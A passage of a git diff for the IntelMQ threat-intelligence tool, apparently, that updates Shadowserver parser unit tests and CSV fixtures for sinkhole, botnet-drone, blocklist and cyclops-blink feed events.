-           'source.geolocation.cc': 'AT',
-           'source.ip': '2001:db8:abcd:12::',
-           'source.port': 33306,
-           'time.source': '2018-04-08T15:03:03+00:00'},
-          {'__type': 'Event',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 64511,
-           'destination.fqdn': '198-51-100-38.example.net',
-           'destination.geolocation.cc': 'NL',
-           'destination.ip': '2a02:1668:1034::2',
-           'destination.port': 80,
-           'extra.http_agent': 'Mercury/907 CFNetwork/758.5.3 Darwin/15.6.0',
-           'destination.url': 'http://198-51-100-38.example.net/',
-           'feed.name': 'ShadowServer IPv6 Sinkhole HTTP Drone',
-           'malware.name': 'xcodeghost',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[3]])),
-           'source.asn': 64511,
-           'source.geolocation.cc': 'AT',
-           'source.ip': '2001:db8:abcd:12::',
-           'source.port': 52394,
-           'time.source': '2018-04-08T19:57:45+00:00'},
-          ]
-
-
-class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
-    """
-    A TestCase for a ShadowserverParserBot.
-    """
-
-    @classmethod
-    def set_bot(cls):
-        cls.bot_reference = ShadowserverParserBot
-        cls.default_input_message = EXAMPLE_REPORT
-
-    def test_event(self):
-        """ Test if correct Event has been produced. """
-        self.run_bot()
-        for i, EVENT in enumerate(EVENTS):
-            self.assertMessageEqual(i, EVENT)
-
-
-if __name__ == '__main__':  # pragma: no cover
-    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_sinkhole_dns.py b/intelmq/tests/bots/parsers/shadowserver/test_sinkhole_dns.py
deleted file mode 100644
index e5761b3c4..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/test_sinkhole_dns.py
+++ /dev/null
@@ -1,91 +0,0 @@
-# SPDX-FileCopyrightText: 2021 Sebastian Wagner
-#
-# SPDX-License-Identifier: AGPL-3.0-or-later
-
-# -*- coding: utf-8 -*-
-
-import os
-import unittest
-
-import intelmq.lib.test as test
-import intelmq.lib.utils as utils
-from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
-
-with open(os.path.join(os.path.dirname(__file__), 'testdata/sinkhole_dns.csv')) as handle:
-    EXAMPLE_FILE = handle.read()
-EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
-
-EXAMPLE_REPORT = {"feed.name": "Sinkhole DNS",
-                  "raw": utils.base64_encode(EXAMPLE_FILE),
-                  "__type": "Report",
-                  "time.observation": "2015-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-sinkhole_dns-test-geo.csv",
-                  }
-
-EVENTS = [{"__type": "Event",
-           "feed.name": "Sinkhole DNS",
-           "classification.identifier": "sinkholedns",
-           "classification.taxonomy": "other",
-           "classification.type": "other",
-           "extra.naics": 0,
-           "extra.tag": "boaxxe",
-           "extra.count": 1,
-           "extra.dns_query": '4.wiNsrw.Com',
-           "extra.response": "",
-           "extra.sector": "",
-           "extra.dns_query_type": "A",
-           "raw": utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           "source.asn": 25192,
-           "source.geolocation.cc": "CZ",
-           "source.geolocation.region": "PRAHA",
-           "source.ip": "198.51.100.1",
-           "source.port": 40159,
-           "time.observation": "2015-01-01T00:00:00+00:00",
-           "time.source": "2020-12-21T00:00:00+00:00",
-           "protocol.application": "dns",
-           },
-           {'__type': 'Event',
-           "feed.name": 'Sinkhole DNS',
-           "classification.identifier": "sinkholedns",
-           "classification.taxonomy": "other",
-           "classification.type": "other",
-           "extra.naics": 0,
-           "extra.tag": "tsifiri",
-           "extra.count": 1,
-           "extra.dns_query": "198-51-100-81.example.net",
-           "extra.response": "",
-           "extra.sector": "Communications",
-           "extra.dns_query_type": "A",
-           "raw": utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           "source.asn": 38044,
-           "source.geolocation.cc": "MY",
-           "source.geolocation.region": "SABAH",
-           "source.ip": "198.51.100.81",
-           "source.port": 62937,
-           "time.observation": "2015-01-01T00:00:00+00:00",
-           "time.source": "2020-12-21T00:00:06+00:00",
-           "protocol.application": "dns",
-           },
-          ]
-
-class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
-    """
-    A TestCase for a ShadowserverParserBot.
-    """
-
-    @classmethod
-    def set_bot(cls):
-        cls.bot_reference = ShadowserverParserBot
-        cls.default_input_message = EXAMPLE_REPORT
-
-    def test_event(self):
-        """ Test if correct Event has been produced. """
-        self.run_bot()
-        for i, EVENT in enumerate(EVENTS):
-            self.assertMessageEqual(i, EVENT)
-
-
-if __name__ == '__main__':  # pragma: no cover
-    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_sinkhole_http_drone.py b/intelmq/tests/bots/parsers/shadowserver/test_sinkhole_http_drone.py
deleted file mode 100644
index da19477c8..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/test_sinkhole_http_drone.py
+++ /dev/null
@@ -1,92 +0,0 @@
-# SPDX-FileCopyrightText: 2018 Sebastian Wagner
-#
-# SPDX-License-Identifier: AGPL-3.0-or-later
-
-# -*- coding: utf-8 -*-
-
-import os
-import unittest
-
-import intelmq.lib.test as test
-import intelmq.lib.utils as utils
-from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
-
-with open(os.path.join(os.path.dirname(__file__),
-          'testdata/sinkhole_http_drone.csv')) as handle:
-    EXAMPLE_FILE = handle.read()
-EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
-
-EXAMPLE_REPORT = {'feed.name': 'Sinkhole HTTP Drone',
-                  "raw": utils.base64_encode(EXAMPLE_FILE),
-                  "__type": "Report",
-                  "time.observation": "2015-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-sinkhole_http_drone-test-geo.csv",
-                  }
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'Sinkhole HTTP Drone',
-           "classification.taxonomy": "malicious-code",
-           "classification.type": "infected-system",
-           "destination.asn": 393667,
-           "destination.geolocation.cc": "US",
-           "destination.ip": "198.51.100.182",
-           "destination.port": 80,
-           "destination.url": "http://198.51.100.68/search?q=0",
-           "extra.naics": 518210,
-           "extra.sic": 737415,
-           "extra.user_agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
-           "malware.name": "downadup",
-           "protocol.application": "http",
-           "protocol.transport": "tcp",
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           "source.asn": 6830,
-           "source.geolocation.cc": "AT",
-           "source.ip": "198.51.100.6",
-           "source.port": 49121,
-           "source.reverse_dns": "198-51-100-6.example.net",
-           "time.observation": "2015-01-01T00:00:00+00:00",
-           "time.source": "2018-03-21T00:00:07+00:00"
-           },
-          {'__type': 'Event',
-           'feed.name': 'Sinkhole HTTP Drone',
-           "classification.taxonomy": "malicious-code",
-           "classification.type": "infected-system",
-           "destination.asn": 6939,
-           "destination.fqdn": "198-51-100-74.example.net",
-           "destination.geolocation.cc": "US",
-           "destination.ip": "198.51.100.35",
-           "destination.port": 80,
-           "malware.name": "avalanche-goznym",
-           "protocol.application": "http",
-           "protocol.transport": "tcp",
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           "source.asn": 8447,
-           "source.geolocation.cc": "AT",
-           "source.ip": "198.51.100.74",
-           "source.port": 28113,
-           "time.observation": "2015-01-01T00:00:00+00:00",
-           "time.source": "2018-03-21T00:00:12+00:00"
-           },
-          ]
-
-
-class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
-    """
-    A TestCase for a ShadowserverParserBot.
-    """
-
-    @classmethod
-    def set_bot(cls):
-        cls.bot_reference = ShadowserverParserBot
-        cls.default_input_message = EXAMPLE_REPORT
-
-    def test_event(self):
-        """ Test if correct Event has been produced. """
-        self.run_bot()
-        for i, EVENT in enumerate(EVENTS):
-            self.assertMessageEqual(i, EVENT)
-
-
-if __name__ == '__main__':  # pragma: no cover
-    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_special.py b/intelmq/tests/bots/parsers/shadowserver/test_special.py
new file mode 100644
index 000000000..abad86cac
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_special.py
@@ -0,0 +1,106 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/special.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Special',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-special-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'special',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.status' : 'likely compromised',
+   'feed.name' : 'Special',
+   'malware.name' : 'cyclops-blink',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'special',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.status' : 'likely compromised',
+   'feed.name' : 'Special',
+   'malware.name' : 'cyclops-blink',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'special',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.source.sector' : 'Professional, Scientific, and Technical Services',
+   'extra.status' : 'likely compromised',
+   'feed.name' : 'Special',
+   'malware.name' : 'cyclops-blink',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/blocklist.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/blocklist.csv
index c1af2a9ed..cfadcbb2d 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/blocklist.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/blocklist.csv
@@ -1,4 +1,4 @@
-"timestamp","ip","hostname","source","reason","asn","geo","region","city","naics","sic","sector"
-"2019-09-04 07:00:19","198.123.245.134",host.local,"Alien Vault","Malicious Host AA",5678,"XX","LOCATION","LOCATION",517311,0,0
-"2019-09-04 07:00:19","198.123.245.171",,"Alien Vault","Malicious Host AA",5678,"XX","LOCATION","LOCATION",517311,0,
-"2019-09-04 07:00:19","198.123.245.0/24",,"Alien Vault","Malicious Host AA",5678,"XX","LOCATION","LOCATION",517311,0,
+"timestamp","ip","hostname","source","reason","asn","geo","region","city","naics","sic","sector","tag"
+"2019-09-04 07:00:19","198.123.245.134",host.local,"Alien Vault","Malicious Host AA",5678,"XX","LOCATION","LOCATION",517311,0,0,
+"2019-09-04 07:00:19","198.123.245.171",,"Alien Vault","Malicious Host AA",5678,"XX","LOCATION","LOCATION",517311,0,,
+"2019-09-04 07:00:19","198.123.245.0/24",,"Alien Vault","Malicious Host AA",5678,"XX","LOCATION","LOCATION",517311,0,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/botnet_drone.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/botnet_drone.csv
deleted file mode 100644
index 65ec5710c..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/botnet_drone.csv
+++ /dev/null
@@ -1,103 +0,0 @@
-"timestamp","ip","port","asn","geo","region","city","hostname","type","infection","url","agent","cc_ip","cc_port","cc_asn","cc_geo","cc_dns","count","proxy","application","p0f_genre","p0f_detail","machine_name","id","naics","sic","cc_naics","cc_sic","sector","cc_sector","ssl_cipher","family","tag","public_source"
-"2011-04-23 00:00:05","210.23.139.130",3218,0,"AU","VICTORIA","MELBOURNE",,"tcp","dorkbot",,,"74.208.164.166",80,8560,"US",,1,,,"Windows","2000 SP4, XP SP1+",,,541690,874899,0,0,,,,"dorkbot","sinkhole","AnubisNetworks"
-"2011-04-23 00:00:08","115.166.54.44",,9556,"AU","SOUTH AUSTRALIA","ADELAIDE","115-166-54-44.ip.adam.com.au",,"spyeye",,,"94.75.228.147",,0,"NL","015.example.com",1,,,"WINXP",,,,0,0,517510,737415,,"Commercial Facilities",,,,
-"2011-04-23 00:00:10","116.212.205.74",48986,9822,"AU","WESTERN AUSTRALIA","PERTH",,"tcp","sinkhole",,,"87.106.24.200",80,8560,"DE",,,,,"Windows","XP SP1+, 2000 SP3 (2)",,,541690,874899,0,0,,,,,,
-"2011-04-23 00:00:15","58.169.82.113",2423,1221,"AU","TASMANIA","DEVONPORT",,"tcp","sinkhole",,,"87.106.24.200",443,8560,"DE",,1,,,"Windows","2000 SP4, XP SP1+",,,0,0,0,0,,"Communications",,,,"SecurityScorecard"
-"2011-04-23 00:00:26","114.78.17.48",2769,4804,"AU","QUEENSLAND","BRISBANE",,"tcp","sinkhole",,,"74.208.164.166",443,8560,"US",,1,,,"Windows","2000 SP4, XP SP1+",,"mu6lam0neitheenahz6Phee6lee1zaelahtha2xu",541690,874899,517510,737415,,"Commercial Facilities",,,,
-"2011-04-23 00:00:28","124.190.16.11",4095,1221,"AU","VICTORIA","MELBOURNE",,"tcp","sinkhole",,,"87.106.24.200",443,8560,"DE",,,,,"Windows","2000 SP4, XP SP1+",,,0,0,0,0,"Communications","Communications",,,,
-"2011-04-23 00:00:29","124.182.36.33",60837,1221,"AU","WESTERN AUSTRALIA","PERTH",,"tcp","sinkhole",,,"87.106.24.200",443,8560,"DE",,1,,,"Windows","XP/2000 (RFC1323+, w+, tstamp+)",,,0,0,517510,737415,,"Communications",,,,
-"2011-04-23 00:00:33","116.212.205.74",23321,9822,"AU","WESTERN AUSTRALIA","PERTH",,"tcp","sinkhole",,,"74.208.164.166",80,8560,"US",,1,,,"Windows","XP SP1+, 2000 SP3 (2)",,,541690,874899,517510,737415,,"Communications",,,,
-"2018-08-14 02:13:36","192.0.2.15",,65548,"AT","BURGENLAND","EISENSTADT",,"tcp","spam",,,,,,,,,,,,,,,0,0,,,,,,,"spam",
-"2016-07-24 00:00:01","198.51.100.4",,31334,"DE","BREMEN","BREMEN","198-51-100-4.example.net",,"bitdefender-ramnit",,,"198.51.100.182",,8075,"US",,,,,,,,,0,0,334111,357101,,"Communications",,,,
-"2016-07-24 00:00:01","198.51.100.176",7960,3320,"DE","NORDRHEIN-WESTFALEN","BONN","198-51-100-176.example.net","udp","zeroaccess",,,"198.51.100.221",16471,22773,"US",,,,,,,,,0,0,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:00:01","198.51.100.176",59202,3320,"DE","BADEN-WURTTEMBERG","KARLSRUHE","198-51-100-176.example.net",,"gozi","198-51-100-176.example.net","Wget/1.16 (linux-gnu)","198.51.100.174",80,8560,"DE","198.51.100.167",,,,,,,,541690,874899,0,0,,,,,,
-"2016-07-24 00:00:02","198.51.100.60",51815,8881,"DE","SACHSEN","CHEMNITZ","198-51-100-60.example.net",,"nivdort","198-51-100-60.example.net",,"198.51.100.7",80,32748,"US","198-51-100-7.example.net",,,,,,,,0,0,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:00:04","198.51.100.24",57530,3320,"DE","BAYERN","INGOLSTADT","198-51-100-24.example.net","udp","zeroaccess",,,"198.51.100.86",16471,22773,"US",,,,,,,,,541690,874899,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:00:05","198.51.100.231",2414,21321,"DE","HESSEN","FRANKFURT AM MAIN","198-51-100-231.example.net","UDP","salityv3",,,"198.51.100.197",5560,24514,"MY",,1,,,,,,,0,0,0,0,"Communications","Communications",,,,
-"2016-07-24 00:00:07","198.51.100.87",1838,3209,"DE","NORDRHEIN-WESTFALEN","ESSEN","198-51-100-87.example.net","udp","zeroaccess",,,"198.51.100.6",16464,22773,"US",,,,,,,,,0,0,517510,737415,,"Communications",,,,
-"2016-07-24 00:00:08","198.51.100.193",1025,3320,"DE","NORDRHEIN-WESTFALEN","MENDEN","198-51-100-193.example.net","udp","zeroaccess",,,"198.51.100.63",16471,22773,"US",,,,,,,,,541690,874899,517510,737415,,"Communications",,,,
-"2016-07-24 00:00:10","198.51.100.179",59253,3320,"DE","NORDRHEIN-WESTFALEN","WESEL","198-51-100-179.example.net",,"nivdort","198-51-100-179.example.net",,"198.51.100.112",80,32748,"US","198-51-100-112.example.net",,,,,,,,541690,874899,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:00:11","198.51.100.189",54142,31334,"DE","BAYERN","NUREMBERG","198-51-100-189.example.net",,"dircrypt","/","Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)","198.51.100.44",80,32748,"US","198-51-100-44.example.net",,,,,,,,0,0,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:00:12","198.51.100.215",2246,29562,"DE","BADEN-WURTTEMBERG","ALDINGEN","198-51-100-215.example.net",,"tinba",,,"198.51.100.231",80,8560,"DE","198-51-100-231.example.net",,,,,,,,0,0,0,0,,,,,,
-"2016-07-24 00:00:12","198.51.100.234",58887,6805,"DE","MECKLENBURG-VORPOMMERN","NEUBRANDENBURG","198-51-100-234.example.net","udp","zeroaccess",,,"198.51.100.165",16464,22773,"US",,,,,,,,,0,0,517510,737415,,"Communications",,,,
-"2016-07-24 00:00:13","198.51.100.170",1026,3320,"DE","NORDRHEIN-WESTFALEN","WUPPERTAL","198-51-100-170.example.net","udp","zeroaccess",,,"198.51.100.66",16471,22773,"US",,,,,,,,,541690,874899,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:00:14","198.51.100.150",48528,12312,"DE","NORDRHEIN-WESTFALEN","DUSSELDORF","198-51-100-150.example.net",,"gameover-zeus-dga","GET /",,"198.51.100.222",80,0,"**","198-51-100-222.example.net",1,,,,,,,0,0,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:00:14","198.51.100.19",6396,12684,"DE","GERMANY","?","198-51-100-19.example.net",,"tinba","/example-index.php","Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;NLNL)","198.51.100.83",80,8560,"DE","198-51-100-83.example.net",,,,,,,,0,0,0,0,,,,,,
-"2016-07-24 00:00:16","198.51.100.61",36003,24940,"DE","BAYERN","GUNZENHAUSEN","198-51-100-94.example.net",,"cycbot","/example-index.php","Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)","198.51.100.242",80,32748,"US","198-51-100-242.example.net",,,,,,,,0,0,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:00:16","198.51.100.251",,9063,"DE","SAARLAND","SAARWELLINGEN","198-51-100-251.example.net",,"bitdefender-pykspa_improved","/","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:198.51.100.41) Gecko/20090824 Firefox/3.5.3","198.51.100.160",80,8708,"RO","198-51-100-160.example.net",,,"http",,,,,0,0,0,0,,,,,,
-"2016-07-24 00:00:17","198.51.100.243",49152,6830,"DE","NORDRHEIN-WESTFALEN","MINDEN","198-51-100-243.example.net","udp","zeroaccess",,,"198.51.100.190",16471,22773,"US",,,,,,,,,0,0,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:00:20","198.51.100.29",34390,31334,"DE","BAYERN","ERLENBACH AM MAIN","198-51-100-29.example.net",,"gameover-zeus-dga","GET /",,"198.51.100.224",80,0,"**","198-51-100-224.example.net",1,,,,,,,0,0,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:00:23","198.51.100.143",49152,3209,"DE","BAYERN","MUNICH","198-51-100-143.example.net","udp","zeroaccess",,,"198.51.100.120",16470,22773,"US",,,,,,,,,0,0,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:00:24","198.51.100.196",5703,16202,"DE","SACHSEN","COSWIG","198-51-100-196.example.net",,"palevo",,,"198.51.100.123",25000,1101,"NL",,,,,,,,,0,0,0,0,,"Information Technology",,,,
-"2016-07-24 00:00:25","198.51.100.122",27894,3320,"DE","NORDRHEIN-WESTFALEN","BOCHUM","198-51-100-122.example.net",,"cycbot","/example-index.php","Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.1.76908; WOW64; en-US)","198.51.100.192",80,32748,"US","198-51-100-192.example.net",,,,,,,,541690,874899,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:00:25","198.51.100.146",3373,6805,"DE","NIEDERSACHSEN","DELMENHORST","198-51-100-146.example.net",,"gameover-zeus-dga","GET /",,"198.51.100.127",80,0,"**","198-51-100-127.example.net",1,,,,,,,0,0,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:00:30","198.51.100.112",49428,3320,"DE","BADEN-WURTTEMBERG","ESSLINGEN AM NECKAR","198-51-100-112.example.net",,"nivdort","198-51-100-112.example.net",,"198.51.100.45",80,32748,"US","198-51-100-45.example.net",,,,,,,,541690,874899,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:00:31","198.51.100.46",1052,13045,"DE","NIEDERSACHSEN","HANNOVER","198-51-100-46.example.net","udp","zeroaccess",,,"198.51.100.202",16464,22773,"US",,,,,,,,,0,0,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:00:31","198.51.100.6",,3320,"DE","BADEN-WURTTEMBERG","DIELHEIM","198-51-100-6.example.net",,"bitdefender-ramnit",,,"198.51.100.34",,8075,"US",,,,,,,,,541690,874899,334111,357101,,"Communications",,,,
-"2016-07-24 00:00:31","198.51.100.210",,3320,"DE","HESSEN","LEUN","198-51-100-210.example.net",,"bitdefender-ramnit",,,"198.51.100.97",,8075,"US",,,,,,,,,541690,874899,334111,357101,,"Communications",,,,
-"2016-07-24 00:00:32","198.51.100.172",,3320,"DE","RHEINLAND-PFALZ","KONGERNHEIM","198-51-100-172.example.net",,"bitdefender-ramnit",,,"198.51.100.20",,8075,"US",,,,,,,,,541690,874899,334111,357101,,"Communications",,,,
-"2016-07-24 00:00:34","198.51.100.181",53759,3320,"DE","NORDRHEIN-WESTFALEN","FREUDENBERG",,,"gameover-zeus-proxy","POST /write",,"198.51.100.244",80,0,"**","default",1,,,,,,,518210,737415,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:00:35","198.51.100.85",62973,31334,"DE","MECKLENBURG-VORPOMMERN","ROSTOCK","198-51-100-85.example.net",,"gameover-zeus-proxy","POST /write",,"198.51.100.150",6332,0,"**",,,,,,,,"dd0b136975149ce41861f8d5154a610faac92113",0,0,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:00:36","198.51.100.154",2426,3320,"DE","BADEN-WURTTEMBERG","STUTTGART","198-51-100-154.example.net",,"dorkbot",,,"198.51.100.83",4293,8426,"PT",,,,"irc",,,,,541690,874899,0,0,,,,"dorkbot","sinkhole","AnubisNetworks"
-"2016-07-24 00:00:36","198.51.100.6",38422,43847,"DE","THURINGEN","BETHENHAUSEN","198-51-100-6.example.net",,"gameover-zeus-dga","GET /",,"198.51.100.228",80,0,"**","198-51-100-228.example.net",1,,,,,,,0,0,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:00:36","198.51.100.150",2868,3320,"DE","RHEINLAND-PFALZ","RENNEROD","198-51-100-150.example.net",,"gameover-zeus-dga","GET /",,"198.51.100.71",80,0,"**","198-51-100-71.example.net",1,,,,,,,541690,874899,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:00:38","198.51.100.239",50442,3320,"DE","HAMBURG","HAMBURG","198-51-100-239.example.net","udp","zeroaccess",,,"198.51.100.46",16470,22773,"US",,,,,,,,,541690,874899,517510,737415,,"Communications",,,,
-"2016-07-24 00:00:38","198.51.100.53",57868,3320,"DE","HESSEN","FRANKFURT AM MAIN","198-51-100-53.example.net",,"dorkbot",,,"198.51.100.78",4293,8426,"PT",,,,"irc",,,,,541690,874899,0,0,,,,"dorkbot","sinkhole","AnubisNetworks"
-"2016-07-24 00:00:39","198.51.100.164",,6805,"DE","RHEINLAND-PFALZ","PIRMASENS","198-51-100-164.example.net",,"bitdefender-ramnit",,,"198.51.100.142",,8075,"US",,,,,,,,,0,0,334111,357101,,"Communications",,,,
-"2016-07-24 00:00:39","198.51.100.85",49155,12638,"DE","NORDRHEIN-WESTFALEN","HAAN",,"udp","zeroaccess",,,"198.51.100.173",16465,22773,"US",,,,,,,,,0,0,517510,737415,,"Communications",,,,
-"2016-07-24 00:00:40","198.51.100.180",52146,3320,"DE","BERLIN","BERLIN","198-51-100-180.example.net","udp","zeroaccess",,,"198.51.100.119",16464,22773,"US",,,,,,,,,541690,874899,517510,737415,,"Communications",,,,
-"2016-07-24 00:00:40","198.51.100.183",,3209,"DE","BAYERN","NUREMBERG","198-51-100-183.example.net",,"bitdefender-ramnit",,,"198.51.100.108",,8075,"US",,,,,,,,,0,0,334111,357101,,"Communications",,,,
-"2016-07-24 00:00:41","198.51.100.221",,6805,"DE","BAYERN","MUNICH","198-51-100-221.example.net",,"bitdefender-ramnit",,,"198.51.100.156",,8075,"US",,,,,,,,,0,0,334111,357101,,"Communications",,,,
-"2016-07-24 00:00:41","198.51.100.200",12706,3320,"DE","BERLIN","BERLIN","198-51-100-200.example.net","udp","zeroaccess",,,"198.51.100.162",16470,22773,"US",,,,,,,,,541690,874899,517510,737415,,"Communications",,,,
-"2016-07-24 00:00:42","198.51.100.140",57515,9145,"DE","NIEDERSACHSEN","VECHTA","198-51-100-140.example.net","udp","zeroaccess",,,"198.51.100.121",16465,22773,"US",,,,,,,,,0,0,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:00:45","198.51.100.33",,6805,"DE","BADEN-WURTTEMBERG","PFORZHEIM","198-51-100-33.example.net",,"bitdefender-ramnit",,,"198.51.100.203",,8075,"US",,,,,,,,,0,0,334111,357101,,"Communications",,,,
-"2016-07-24 00:00:45","198.51.100.16",62830,31334,"DE","NIEDERSACHSEN","HANNOVER","198-51-100-16.example.net","udp","zeroaccess",,,"198.51.100.166",16464,22773,"US",,,,,,,,,0,0,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:00:47","198.51.100.135",53449,6805,"DE","NORDRHEIN-WESTFALEN","OBERHAUSEN","198-51-100-135.example.net",,"tinba","/example-index.php",,"198.51.100.154",80,32748,"US","198-51-100-154.example.net",,,,,,,,0,0,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:00:47","198.51.100.237",17985,3209,"DE","HAMBURG","HAMBURG","198-51-100-237.example.net",,"gameover-zeus-dga","GET /",,"198.51.100.45",80,0,"**","198-51-100-45.example.net",1,,,,,,,518210,737415,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:00:48","198.51.100.140",49152,31334,"DE","SCHLESWIG-HOLSTEIN","SIEK","198-51-100-140.example.net","udp","zeroaccess",,,"198.51.100.128",16470,22773,"US",,,,,,,,,0,0,517510,737415,,"Communications",,,,
-"2016-07-24 00:00:49","198.51.100.125",1433,3320,"DE","NORDRHEIN-WESTFALEN","ESSEN","198-51-100-125.example.net","udp","zeroaccess",,,"198.51.100.167",16464,22773,"US",,,,,,,,,541690,874899,517510,737415,,"Communications",,,,
